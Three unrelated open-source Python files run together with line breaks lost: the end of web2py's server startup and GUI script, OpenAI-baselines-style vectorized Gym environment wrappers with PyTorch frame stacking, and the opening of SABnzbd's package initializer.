p.terminate() p.join() self.update_schedulers() def try_start_scheduler(self, app): if app not in self.scheduler_processes: t = threading.Thread(target=self.start_schedulers, args=(app,)) t.start() def checkTaskBar(self): """ Check taskbar status """ if self.tb.status: if self.tb.status[0] == self.tb.EnumStatus.QUIT: self.quit() elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE: if self.root.state() == 'withdrawn': self.root.deiconify() else: self.root.withdraw() elif self.tb.status[0] == self.tb.EnumStatus.STOP: self.stop() elif self.tb.status[0] == self.tb.EnumStatus.START: self.start() elif self.tb.status[0] == self.tb.EnumStatus.RESTART: self.stop() self.start() del self.tb.status[0] self.root.after(1000, self.checkTaskBar) def update(self, text): """ Update app text """ try: self.text.configure(state='normal') self.text.insert('end', text) self.text.configure(state='disabled') except: pass # ## this should only happen in case app is destroyed def connect_pages(self): """ Connect pages """ #reset the menu available_apps = [arq for arq in os.listdir('applications/') if os.path.exists( 'applications/%s/__init__.py' % arq)] self.pagesmenu.delete(0, len(available_apps)) for arq in available_apps: url = self.url + arq self.pagesmenu.add_command( label=url, command=lambda u=url: start_browser(u)) def quit(self, justHide=False): """ Finish the program execution """ if justHide: self.root.withdraw() else: try: scheds = self.scheduler_processes.keys() for t in scheds: self.try_stop_scheduler(t) except: pass try: newcron.stopcron() except: pass try: self.server.stop() except: pass try: self.tb.Destroy() except: pass self.root.destroy() sys.exit(0) def error(self, message): """ Show error message """ import tkMessageBox tkMessageBox.showerror('web2py start server', message) def start(self): """ Start web2py server """ password = self.password.get() if not password: self.error('no password, no web admin interface') ip = self.selected_ip.get() if not is_valid_ip_address(ip): return self.error('invalid host ip address') try: port = int(self.port_number.get()) except: return self.error('invalid port number') # Check for non default value for ssl inputs if (len(self.options.ssl_certificate) > 0 or len(self.options.ssl_private_key) > 0): proto = 'https' else: proto = 'http' self.url = get_url(ip, proto=proto, port=port) self.connect_pages() self.button_start.configure(state='disabled') try: options = self.options req_queue_size = options.request_queue_size self.server = main.HttpServer( ip, port, password, pid_filename=options.pid_filename, log_filename=options.log_filename, profiler_dir=options.profiler_dir, ssl_certificate=options.ssl_certificate, ssl_private_key=options.ssl_private_key, ssl_ca_certificate=options.ssl_ca_certificate, min_threads=options.minthreads, max_threads=options.maxthreads, server_name=options.server_name, request_queue_size=req_queue_size, timeout=options.timeout, shutdown_timeout=options.shutdown_timeout, path=options.folder, interfaces=options.interfaces) thread.start_new_thread(self.server.start, ()) except Exception, e: self.button_start.configure(state='normal') return self.error(str(e)) if not self.server_ready(): self.button_start.configure(state='normal') return self.button_stop.configure(state='normal') if not options.taskbar: thread.start_new_thread( start_browser, (get_url(ip, proto=proto, port=port), True)) self.password.configure(state='readonly') [ip.configure(state='disabled') for ip in self.ips.values()] self.port_number.configure(state='readonly') if self.tb: self.tb.SetServerRunning() def server_ready(self): for listener in self.server.server.listeners: if listener.ready: return True return False def stop(self): """ Stop web2py server """ self.button_start.configure(state='normal') self.button_stop.configure(state='disabled') self.password.configure(state='normal') [ip.configure(state='normal') for ip in self.ips.values()] self.port_number.configure(state='normal') self.server.stop() if self.tb: self.tb.SetServerStopped() def update_canvas(self): """ Update canvas """ try: t1 = os.path.getsize('httpserver.log') except: self.canvas.after(1000, self.update_canvas) return try: fp = open('httpserver.log', 'r') fp.seek(self.t0) data = fp.read(t1 - self.t0) fp.close() value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))] self.p0 = value for i in xrange(len(self.p0) - 1): c = self.canvas.coords(self.q0[i]) self.canvas.coords(self.q0[i], (c[0], self.p0[i], c[2], self.p0[i + 1])) self.t0 = t1 except BaseException: self.t0 = time.time() self.t0 = t1 self.p0 = [100] * 300 self.q0 = [self.canvas.create_line(i, 100, i + 1, 100, fill='green') for i in xrange(len(self.p0) - 1)] self.canvas.after(1000, self.update_canvas) def console(): """ Defines the behavior of the console web2py execution """ import optparse import textwrap usage = "python web2py.py" description = """\ web2py Web Framework startup script. ATTENTION: unless a password is specified (-a 'passwd') web2py will attempt to run a GUI. In this case command line options are ignored.""" description = textwrap.dedent(description) parser = optparse.OptionParser( usage, None, optparse.Option, ProgramVersion) parser.description = description msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); ' 'Note: This value is ignored when using the \'interfaces\' option.') parser.add_option('-i', '--ip', default='127.0.0.1', dest='ip', help=msg) parser.add_option('-p', '--port', default='8000', dest='port', type='int', help='port of server (8000)') msg = ('password to be used for administration ' '(use -a "<recycle>" to reuse the last password))') parser.add_option('-a', '--password', default='<ask>', dest='password', help=msg) parser.add_option('-c', '--ssl_certificate', default='', dest='ssl_certificate', help='file that contains ssl certificate') parser.add_option('-k', '--ssl_private_key', default='', dest='ssl_private_key', help='file that contains ssl private key') msg = ('Use this file containing the CA certificate to validate X509 ' 'certificates from clients') parser.add_option('--ca-cert', action='store', dest='ssl_ca_certificate', default=None, help=msg) parser.add_option('-d', '--pid_filename', default='httpserver.pid', dest='pid_filename', help='file to store the pid of the server') parser.add_option('-l', '--log_filename', default='httpserver.log', dest='log_filename', help='file to log connections') parser.add_option('-n', '--numthreads', default=None, type='int', dest='numthreads', help='number of threads (deprecated)') parser.add_option('--minthreads', default=None, type='int', dest='minthreads', help='minimum number of server threads') parser.add_option('--maxthreads', default=None, type='int', dest='maxthreads', help='maximum number of server threads') parser.add_option('-s', '--server_name', default=socket.gethostname(), dest='server_name', help='server name for the web server') msg = 'max number of queued requests when server unavailable' parser.add_option('-q', '--request_queue_size', default='5', type='int', dest='request_queue_size', help=msg) parser.add_option('-o', '--timeout', default='10', type='int', dest='timeout', help='timeout for individual request (10 seconds)') parser.add_option('-z', '--shutdown_timeout', default='5', type='int', dest='shutdown_timeout', help='timeout on shutdown of server (5 seconds)') parser.add_option('--socket-timeout', default=5, type='int', dest='socket_timeout', help='timeout for socket (5 second)') parser.add_option('-f', '--folder', default=os.getcwd(), dest='folder', help='folder from which to run web2py') parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False, help='increase --test verbosity') parser.add_option('-Q', '--quiet', action='store_true', dest='quiet', default=False, help='disable all output') msg = ('set debug output level (0-100, 0 means all, 100 means none; ' 'default is 30)') parser.add_option('-D', '--debug', dest='debuglevel', default=30, type='int', help=msg) msg = ('run web2py in interactive shell or IPython (if installed) with ' 'specified appname (if app does not exist it will be created). ' 'APPNAME like a/c/f (c,f optional)') parser.add_option('-S', '--shell', dest='shell', metavar='APPNAME', help=msg) msg = ('run web2py in interactive shell or bpython (if installed) with ' 'specified appname (if app does not exist it will be created).\n' 'Use combined with --shell') parser.add_option('-B', '--bpython', action='store_true', default=False, dest='bpython', help=msg) msg = 'only use plain python shell; should be used with --shell option' parser.add_option('-P', '--plain', action='store_true', default=False, dest='plain', help=msg) msg = ('auto import model files; default is False; should be used ' 'with --shell option') parser.add_option('-M', '--import_models', action='store_true', default=False, dest='import_models', help=msg) msg = ('run PYTHON_FILE in web2py environment; ' 'should be used with --shell option') parser.add_option('-R', '--run', dest='run', metavar='PYTHON_FILE', default='', help=msg) msg = ('run scheduled tasks for the specified apps: expects a list of ' 'app names as -K app1,app2,app3 ' 'or a list of app:groups as -K app1:group1:group2,app2:group1 ' 'to override specific group_names. (only strings, no spaces ' 'allowed. Requires a scheduler defined in the models') parser.add_option('-K', '--scheduler', dest='scheduler', default=None, help=msg) msg = 'run schedulers alongside webserver, needs -K app1 and -a too' parser.add_option('-X', '--with-scheduler', action='store_true', default=False, dest='with_scheduler', help=msg) msg = ('run doctests in web2py environment; ' 'TEST_PATH like a/c/f (c,f optional)') parser.add_option('-T', '--test', dest='test', metavar='TEST_PATH', default=None, help=msg) msg = 'trigger a cron run manually; usually invoked from a system crontab' parser.add_option('-C', '--cron', action='store_true', dest='extcron', default=False, help=msg) msg = 'triggers the use of softcron' parser.add_option('--softcron', action='store_true', dest='softcron', default=False, help=msg) parser.add_option('-Y', '--run-cron', action='store_true', dest='runcron', default=False, help='start the background cron process') parser.add_option('-J', '--cronjob', action='store_true', dest='cronjob', default=False, help='identify cron-initiated command') parser.add_option('-L', '--config', dest='config', default='', help='config file') parser.add_option('-F', '--profiler', dest='profiler_dir', default=None, help='profiler dir') parser.add_option('-t', '--taskbar', action='store_true', dest='taskbar', default=False, help='use web2py gui and run in taskbar (system tray)') parser.add_option('', '--nogui', action='store_true', default=False, dest='nogui', help='text-only, no GUI') msg = ('should be followed by a list of arguments to be passed to script, ' 'to be used with -S, -A must be the last option') parser.add_option('-A', '--args', action='store', dest='args', default=None, help=msg) parser.add_option('--no-banner', action='store_true', default=False, dest='nobanner', help='Do not print header banner') msg = ('listen on multiple addresses: ' '"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." ' '(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in ' 'square [] brackets)') parser.add_option('--interfaces', action='store', dest='interfaces', default=None, help=msg) msg = 'runs web2py tests' parser.add_option('--run_system_tests', action='store_true', dest='run_system_tests', default=False, help=msg) msg = ('adds coverage reporting (needs --run_system_tests), ' 'python 2.7 and the coverage module installed. ' 'You can alter the default path setting the environmental ' 'var "COVERAGE_PROCESS_START". ' 'By default it takes gluon/tests/coverage.ini') parser.add_option('--with_coverage', action='store_true', dest='with_coverage', default=False, help=msg) if '-A' in sys.argv: k = sys.argv.index('-A') elif '--args' in sys.argv: k = sys.argv.index('--args') else: k = len(sys.argv) sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:] (options, args) = parser.parse_args() options.args = [options.run] + other_args global_settings.cmd_options = options global_settings.cmd_args = args try: options.ips = list(set( # no duplicates [addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn()) if not is_loopback_ip_address(addrinfo=addrinfo)])) except socket.gaierror: options.ips = [] if options.run_system_tests: run_system_tests(options) if options.quiet: capture = cStringIO.StringIO() sys.stdout = capture logger.setLevel(logging.CRITICAL + 1) else: logger.setLevel(options.debuglevel) if options.config[-3:] == '.py': options.config = options.config[:-3] if options.cronjob: global_settings.cronjob = True # tell the world options.plain = True # cronjobs use a plain shell options.nobanner = True options.nogui = True options.folder = os.path.abspath(options.folder) # accept --interfaces in the form # "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3" # (no spaces; optional key:cert indicate SSL) if isinstance(options.interfaces, str): interfaces = options.interfaces.split(';') options.interfaces = [] for interface in interfaces: if interface.startswith('['): # IPv6 ip, if_remainder = interface.split(']', 1) ip = ip[1:] if_remainder = if_remainder[1:].split(':') if_remainder[0] = int(if_remainder[0]) # numeric port options.interfaces.append(tuple([ip] + if_remainder)) else: # IPv4 interface = interface.split(':') interface[1] = int(interface[1]) # numeric port options.interfaces.append(tuple(interface)) # accepts --scheduler in the form # "app:group1,group2,app2:group1" scheduler = [] options.scheduler_groups = None if isinstance(options.scheduler, str): if ':' in options.scheduler: for opt in options.scheduler.split(','): scheduler.append(opt.split(':')) options.scheduler = ','.join([app[0] for app in scheduler]) options.scheduler_groups = scheduler if options.numthreads is not None and options.minthreads is None: options.minthreads = options.numthreads # legacy create_welcome_w2p() if not options.cronjob: # If we have the applications package or if we should upgrade if not os.path.exists('applications/__init__.py'): write_file('applications/__init__.py', '') return options, args def check_existent_app(options, appname): if os.path.isdir(os.path.join(options.folder, 'applications', appname)): return True def get_code_for_scheduler(app, options): if len(app) == 1 or app[1] is None: code = "from gluon import current;current._scheduler.loop()" else: code = "from gluon import current;current._scheduler.group_names = ['%s'];" code += "current._scheduler.loop()" code = code % ("','".join(app[1:])) app_ = app[0] if not check_existent_app(options, app_): print "Application '%s' doesn't exist, skipping" % app_ return None, None return app_, code def start_schedulers(options): try: from multiprocessing import Process except: sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n') return processes = [] apps = [(app.strip(), None) for app in options.scheduler.split(',')] if options.scheduler_groups: apps = options.scheduler_groups code = "from gluon import current;current._scheduler.loop()" logging.getLogger().setLevel(options.debuglevel) if len(apps) == 1 and not options.with_scheduler: app_, code = get_code_for_scheduler(apps[0], options) if not app_: return print 'starting single-scheduler for "%s"...' % app_ run(app_, True, True, None, False, code) return for app in apps: app_, code = get_code_for_scheduler(app, options) if not app_: continue print 'starting scheduler for "%s"...' % app_ args = (app_, True, True, None, False, code) p = Process(target=run, args=args) processes.append(p) print "Currently running %s scheduler processes" % (len(processes)) p.start() ##to avoid bashing the db at the same time time.sleep(0.7) print "Processes started" for p in processes: try: p.join() except (KeyboardInterrupt, SystemExit): print "Processes stopped" except: p.terminate() p.join() def start(cron=True): """ Start server """ # ## get command line arguments (options, args) = console() if not options.nobanner: print ProgramName print ProgramAuthor print ProgramVersion from dal import DRIVERS if not options.nobanner: print 'Database drivers available: %s' % ', '.join(DRIVERS) # ## if -L load options from options.config file if options.config: try: options2 = __import__(options.config, {}, {}, '') except Exception: try: # Jython doesn't like the extra stuff options2 = __import__(options.config) except Exception: print 'Cannot import config file [%s]' % options.config sys.exit(1) for key in dir(options2): if hasattr(options, key): setattr(options, key, getattr(options2, key)) logfile0 = os.path.join('extras','examples','logging.example.conf') if not os.path.exists('logging.conf') and os.path.exists(logfile0): import shutil sys.stdout.write("Copying logging.conf.example to logging.conf ... ") shutil.copyfile('logging.example.conf', logfile0) sys.stdout.write("OK\n") # ## if -T run doctests (no cron) if hasattr(options, 'test') and options.test: test(options.test, verbose=options.verbose) return # ## if -S start interactive shell (also no cron) if options.shell: if not options.args is None: sys.argv[:] = options.args run(options.shell, plain=options.plain, bpython=options.bpython, import_models=options.import_models, startfile=options.run, cronjob=options.cronjob) return # ## if -C start cron run (extcron) and exit # ## -K specifies optional apps list (overloading scheduler) if options.extcron: logger.debug('Starting extcron...') global_settings.web2py_crontype = 'external' if options.scheduler: # -K apps = [app.strip() for app in options.scheduler.split( ',') if check_existent_app(options, app.strip())] else: apps = None extcron = newcron.extcron(options.folder, apps=apps) extcron.start() extcron.join() return # ## if -K if options.scheduler and not options.with_scheduler: try: start_schedulers(options) except KeyboardInterrupt: pass return # ## if -H cron is enabled in this *process* # ## if --softcron use softcron # ## use hardcron in all other cases if cron and options.runcron and options.softcron: print 'Using softcron (but this is not very efficient)' global_settings.web2py_crontype = 'soft' elif cron and options.runcron: logger.debug('Starting hardcron...') global_settings.web2py_crontype = 'hard' newcron.hardcron(options.folder).start() # ## if no password provided and havetk start Tk interface # ## or start interface if we want to put in taskbar (system tray) try: options.taskbar except: options.taskbar = False if options.taskbar and os.name != 'nt': print 'Error: taskbar not supported on this platform' sys.exit(1) root = None if not options.nogui: try: import Tkinter havetk = True except ImportError: logger.warn( 'GUI not available because Tk library is not installed') havetk = False options.nogui = True if options.password == '<ask>' and havetk or options.taskbar and havetk: try: root = Tkinter.Tk() except: pass if root: root.focus_force() # Mac OS X - make the GUI window rise to the top if os.path.exists("/usr/bin/osascript"): applescript = """ tell application "System Events" set proc to first process whose unix id is %d set frontmost of proc to true end tell """ % (os.getpid()) os.system("/usr/bin/osascript -e '%s'" % applescript) if not options.quiet: presentation(root) master = web2pyDialog(root, options) signal.signal(signal.SIGTERM, lambda a, b: master.quit()) try: root.mainloop() except: master.quit() sys.exit() # ## if no tk and no password, ask for a password if not root and options.password == '<ask>': options.password = getpass.getpass('choose a password:') if not options.password and not options.nobanner: print 'no password, no admin interface' # ##-X (if no tk, the widget takes care of it himself) if not root and options.scheduler and options.with_scheduler: t = threading.Thread(target=start_schedulers, args=(options,)) t.start() # ## start server # Use first interface IP and port if interfaces specified, since the # interfaces option overrides the IP (and related) options. if not options.interfaces: (ip, port) = (options.ip, int(options.port)) else: first_if = options.interfaces[0] (ip, port) = first_if[0], first_if[1] # Check for non default value for ssl inputs if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0): proto = 'https' else: proto = 'http' url = get_url(ip, proto=proto, port=port) if not options.nobanner: print 'please visit:' print '\t', url print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid() # enhance linecache.getline (used by debugger) to look at the source file # if the line was not found (under py2exe & when file was modified) import linecache py2exe_getline = linecache.getline def getline(filename, lineno, *args, **kwargs): line = py2exe_getline(filename, lineno, *args, **kwargs) if not line: try: f = open(filename, "r") try: for i, line in enumerate(f): if lineno == i + 1: break else: line = None finally: f.close() except (IOError, OSError): line = None return line linecache.getline = getline server = main.HttpServer(ip=ip, port=port, password=options.password, pid_filename=options.pid_filename, log_filename=options.log_filename, profiler_dir=options.profiler_dir, ssl_certificate=options.ssl_certificate, ssl_private_key=options.ssl_private_key, ssl_ca_certificate=options.ssl_ca_certificate, min_threads=options.minthreads, max_threads=options.maxthreads, server_name=options.server_name, request_queue_size=options.request_queue_size, timeout=options.timeout, socket_timeout=options.socket_timeout, shutdown_timeout=options.shutdown_timeout, path=options.folder, interfaces=options.interfaces) try: server.start() except KeyboardInterrupt: server.stop() try: t.join() except: pass logging.shutdown()
multiprocessing_env.py
# This code is from openai baseline # https://github.com/openai/baselines/tree/master/baselines/common/vec_env import numpy as np from multiprocessing import Process, Pipe from gym import spaces def worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.x() while True: cmd, data = remote.recv() if cmd == 'step': ob, reward, done, info = env.step(data) if done: ob = env.reset() remote.send((ob, reward, done, info)) elif cmd == 'reset': ob = env.reset() remote.send(ob) elif cmd == 'reset_task': ob = env.reset_task() remote.send(ob) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) else: raise NotImplementedError class VecEnv(object): """ An abstract asynchronous, vectorized environment. """ def __init__(self, num_envs, observation_space, action_space): self.num_envs = num_envs self.observation_space = observation_space self.action_space = action_space def reset(self): """ Reset all the environments and return an array of observations, or a tuple of observation arrays. If step_async is still doing work, that work will be cancelled and step_wait() should not be called until step_async() is invoked again. """ pass def step_async(self, actions): """ Tell all the environments to start taking a step with the given actions. Call step_wait() to get the results of the step. You should not call this if a step_async run is already pending. """ pass def step_wait(self): """ Wait for the step taken with step_async(). Returns (obs, rews, dones, infos): - obs: an array of observations, or a tuple of arrays of observations. - rews: an array of rewards - dones: an array of "episode done" booleans - infos: a sequence of info objects """ pass def close(self): """ Clean up the environments' resources. """ pass def step(self, actions): self.step_async(actions) return self.step_wait() class CloudpickleWrapper(object): """ Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle) """ def __init__(self, x): self.x = x def __getstate__(self): import cloudpickle return cloudpickle.dumps(self.x) def __setstate__(self, ob): import pickle self.x = pickle.loads(ob) class SubprocVecEnv(VecEnv): def __init__(self, env_fns, spaces=None): """ envs: list of gym environments to run in subprocesses """ self.waiting = False self.closed = False nenvs = len(env_fns) self.nenvs = nenvs self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)]) self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)] for p in self.ps: p.daemon = True # if the main process crashes, we should not cause things to hang p.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) return np.stack(obs), np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) return np.stack([remote.recv() for remote in self.remotes]) def reset_task(self): for remote in self.remotes: remote.send(('reset_task', None)) return np.stack([remote.recv() for remote in self.remotes]) def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for p in self.ps: p.join() self.closed = True def __len__(self): return self.nenvs class VecEnvWrapper(VecEnv): def __init__(self, venv, observation_space=None, action_space=None): self.venv = venv VecEnv.__init__(self, num_envs=venv.num_envs, observation_space=observation_space or venv.observation_space, action_space=action_space or venv.action_space) def step_async(self, actions): self.venv.step_async(actions) def reset(self): pass def step_wait(self): pass def close(self): return self.venv.close() def render(self): self.venv.render() class VecFrameStack(VecEnvWrapper): """ Vectorized environment base class """ def __init__(self, venv, num_stacks): self.venv = venv self.num_stacks = num_stacks wos = venv.observation_space # wrapped ob space low = np.repeat(wos.low, self.num_stacks, axis=0) high = np.repeat(wos.high, self.num_stacks, axis=0) self.observations = np.zeros((venv.num_envs,) + low.shape, low.dtype) observation_space = spaces.Box(low=low, high=high, dtype=venv.observation_space.dtype) VecEnvWrapper.__init__(self, venv, observation_space=observation_space) def step_wait(self): shape = self.observation_space.shape obs, rews, news, infos = self.venv.step_wait() self.observations[:, :-shape[0]] = self.observations[:, shape[0]:] for (i, new) in enumerate(news): if new: self.observations[i] = 0 self.observations[:, -shape[0]:] = obs return self.observations, rews, news, infos def reset(self): """ Reset all environments """ shape = self.observation_space.shape obs = self.venv.reset() self.observations[...] = 0 self.observations[:, -shape[0]:] = obs return self.observations def close(self): self.venv.close() import torch import gym # Derived from # https://github.com/openai/baselines/blob/master/baselines/common/vec_env/vec_frame_stack.py class VecPyTorchFrameStack(VecEnvWrapper): def __init__(self, venv, nstack, device=None): self.venv = venv self.nstack = nstack wos = venv.observation_space # wrapped ob space self.shape_dim0 = wos.shape[0] low = np.repeat(wos.low, self.nstack, axis=0) high = np.repeat(wos.high, self.nstack, axis=0) if device is None: device = torch.device('cpu') self.stacked_obs = torch.zeros((venv.num_envs,) + low.shape).to(device) observation_space = gym.spaces.Box( low=low, high=high, dtype=venv.observation_space.dtype) VecEnvWrapper.__init__(self, venv, observation_space=observation_space) def step_wait(self): obs, rews, news, infos = self.venv.step_wait() self.stacked_obs[:, :-self.shape_dim0] = \ self.stacked_obs[:, self.shape_dim0:] for (i, new) in enumerate(news): if new: self.stacked_obs[i] = 0 self.stacked_obs[:, -self.shape_dim0:] = obs return self.stacked_obs, rews, news, infos def reset(self): obs = self.venv.reset() self.stacked_obs.zero_() self.stacked_obs[:, -self.shape_dim0:] = obs return self.stacked_obs def close(self): self.venv.close() class VecPyTorch(VecEnvWrapper): def __init__(self, venv, device): """Return only every `skip`-th frame""" super(VecPyTorch, self).__init__(venv) self.device = device # TODO: Fix data types def reset(self): obs = self.venv.reset() obs = torch.from_numpy(obs).float().to(self.device) return obs def step_async(self, actions): actions = actions.squeeze(1).cpu().numpy() self.venv.step_async(actions) def step_wait(self): obs, reward, done, info = self.venv.step_wait() obs = torch.from_numpy(obs).float().to(self.device) reward = torch.from_numpy(reward).unsqueeze(dim=1).float() return obs, reward, done, info
__init__.py
#!/usr/bin/python3 -OO # Copyright 2007-2021 The SABnzbd-Team <[email protected]> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import os import logging import datetime import tempfile import pickle import ctypes.util import gzip import time import socket import cherrypy import cherrypy._cpreqbody import platform import sys import ssl from threading import Lock, Thread, Condition from typing import Any, AnyStr, Optional, Union ############################################################################## # Determine platform flags ############################################################################## WIN32 = DARWIN = FOUNDATION = WIN64 = DOCKER = False KERNEL32 = LIBC = MACOSLIBC = None if os.name == "nt": WIN32 = True from sabnzbd.utils.apireg import del_connection_info try: KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll") except: pass elif os.name == "posix": ORG_UMASK = os.umask(18) os.umask(ORG_UMASK) # Check if running in a Docker container try: with open("/proc/1/cgroup", "rt") as ifh: DOCKER = ":/docker/" in ifh.read() except: pass # See if we have the GNU glibc malloc_trim() memory release function try: LIBC = ctypes.CDLL("libc.so.6") LIBC.malloc_trim(0) # try the malloc_trim() call, which is a GNU extension except: # No malloc_trim(), probably because no glibc LIBC = None pass # Parse macOS version numbers if platform.system().lower() == "darwin": DARWIN = True # 12 = Sierra, 11 = ElCaptain, 10 = Yosemite, 9 = Mavericks, 8 = MountainLion DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1]) MACOSLIBC = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True) # the MacOS C library try: import Foundation import sabnzbd.utils.sleepless as sleepless FOUNDATION = True except: pass # Imported to be referenced from other files directly from sabnzbd.version import __version__, __baseline__ # Now we can import safely import sabnzbd.misc as misc import sabnzbd.filesystem as filesystem import sabnzbd.powersup as powersup import sabnzbd.rss as rss import sabnzbd.emailer as emailer import sabnzbd.encoding as encoding import sabnzbd.config as config import sabnzbd.cfg as cfg import sabnzbd.database import sabnzbd.lang as lang import sabnzbd.nzbparser as nzbparser import sabnzbd.nzbstuff import sabnzbd.getipaddress import sabnzbd.newsunpack import sabnzbd.par2file import sabnzbd.api import sabnzbd.interface import sabnzbd.zconfig import sabnzbd.directunpacker as directunpacker import sabnzbd.dirscanner import sabnzbd.urlgrabber import sabnzbd.nzbqueue import sabnzbd.postproc import sabnzbd.downloader import sabnzbd.decoder import sabnzbd.assembler import sabnzbd.rating import sabnzbd.articlecache import sabnzbd.bpsmeter import sabnzbd.scheduler as scheduler import sabnzbd.notifier as notifier from sabnzbd.decorators import synchronized from sabnzbd.constants import ( DEFAULT_PRIORITY, VALID_ARCHIVES, REPAIR_REQUEST, ) import sabnzbd.utils.ssdp # Storage for the threads, variables are filled during initialization ArticleCache: sabnzbd.articlecache.ArticleCache Rating: sabnzbd.rating.Rating Assembler: sabnzbd.assembler.Assembler Decoder: sabnzbd.decoder.Decoder Downloader: sabnzbd.downloader.Downloader PostProcessor: sabnzbd.postproc.PostProcessor NzbQueue: sabnzbd.nzbqueue.NzbQueue URLGrabber: sabnzbd.urlgrabber.URLGrabber DirScanner: sabnzbd.dirscanner.DirScanner BPSMeter: sabnzbd.bpsmeter.BPSMeter RSSReader: sabnzbd.rss.RSSReader Scheduler: sabnzbd.scheduler.Scheduler # Regular constants START = datetime.datetime.now() MY_NAME = None MY_FULLNAME = None RESTART_ARGS = [] NEW_VERSION = (None, None) DIR_HOME = None DIR_LCLDATA = None DIR_PROG = None DIR_INTERFACES = None DIR_LANGUAGE = None DIR_PID = None QUEUECOMPLETE = None # stores the nice name of the action QUEUECOMPLETEACTION = None # stores the name of the function to be called QUEUECOMPLETEARG = None # stores an extra arguments that need to be passed DAEMON = None LINUX_POWER = powersup.HAVE_DBUS LOGFILE = None WEBLOGFILE = None GUIHANDLER = None LOG_ALL = False AMBI_LOCALHOST = False WIN_SERVICE = None # Instance of our Win32 Service Class BROWSER_URL = None CERTIFICATE_VALIDATION = True NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar) WEB_DIR = None WEB_DIR_CONFIG = None WIZARD_DIR = None WEB_COLOR = None SABSTOP = False RESTART_REQ = False PAUSED_ALL = False TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac WINTRAY = None # Thread for the Windows SysTray icon WEBUI_READY = False EXTERNAL_IPV6 = False LAST_HISTORY_UPDATE = 1 # Condition used to handle the main loop in SABnzbd.py SABSTOP_CONDITION = Condition(Lock()) # Performance measure for dashboard PYSTONE_SCORE = 0 DOWNLOAD_DIR_SPEED = 0 COMPLETE_DIR_SPEED = 0 INTERNET_BANDWIDTH = 0 # Rendering of original command line arguments in Config CMDLINE = " ".join(['"%s"' % arg for arg in sys.argv]) __INITIALIZED__ = False __SHUTTING_DOWN__ = False ############################################################################## # Signal Handler ############################################################################## def sig_handler(signum=None, frame=None): if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5: # Ignore the "logoff" event when running as a Win32 daemon return True if signum is not None: logging.warning(T("Signal %s caught, saving and exiting..."), signum) sabnzbd.shutdown_program() ############################################################################## # Initializing ############################################################################## INIT_LOCK = Lock() def get_db_connection(thread_index=0): # Create a connection and store it in the current thread if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db): cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB() return cherrypy.thread_data.history_db @synchronized(INIT_LOCK) def initialize(pause_downloader=False, clean_up=False, repair=0): if sabnzbd.__INITIALIZED__: return False sabnzbd.__SHUTTING_DOWN__ = False # Set global database connection for Web-UI threads cherrypy.engine.subscribe("start_thread", get_db_connection) # Paused? pause_downloader = pause_downloader or cfg.start_paused() # Clean-up, if requested if clean_up: # New admin folder filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab") # Optionally wait for "incomplete" to become online if cfg.wait_for_dfolder(): wait_for_download_folder() else: cfg.download_dir.set(cfg.download_dir(), create=True) cfg.download_dir.set_create(True) # Set access rights for "incomplete" base folder filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False) # If dirscan_dir cannot be created, set a proper value anyway. # Maybe it's a network path that's temporarily missing. path = cfg.dirscan_dir.get_path() if not os.path.exists(path): filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False) # Set call backs for Config items cfg.cache_limit.callback(new_limit) cfg.cherryhost.callback(guard_restart) cfg.cherryport.callback(guard_restart) cfg.web_dir.callback(guard_restart) cfg.web_color.callback(guard_restart) cfg.username.callback(guard_restart) cfg.password.callback(guard_restart) cfg.log_dir.callback(guard_restart) cfg.https_port.callback(guard_restart) cfg.https_cert.callback(guard_restart) cfg.https_key.callback(guard_restart) cfg.enable_https.callback(guard_restart) cfg.top_only.callback(guard_top_only) cfg.pause_on_post_processing.callback(guard_pause_on_pp) cfg.quota_size.callback(guard_quota_size) cfg.quota_day.callback(guard_quota_dp) cfg.quota_period.callback(guard_quota_dp) cfg.language.callback(guard_language) cfg.enable_https_verification.callback(guard_https_ver) guard_https_ver() 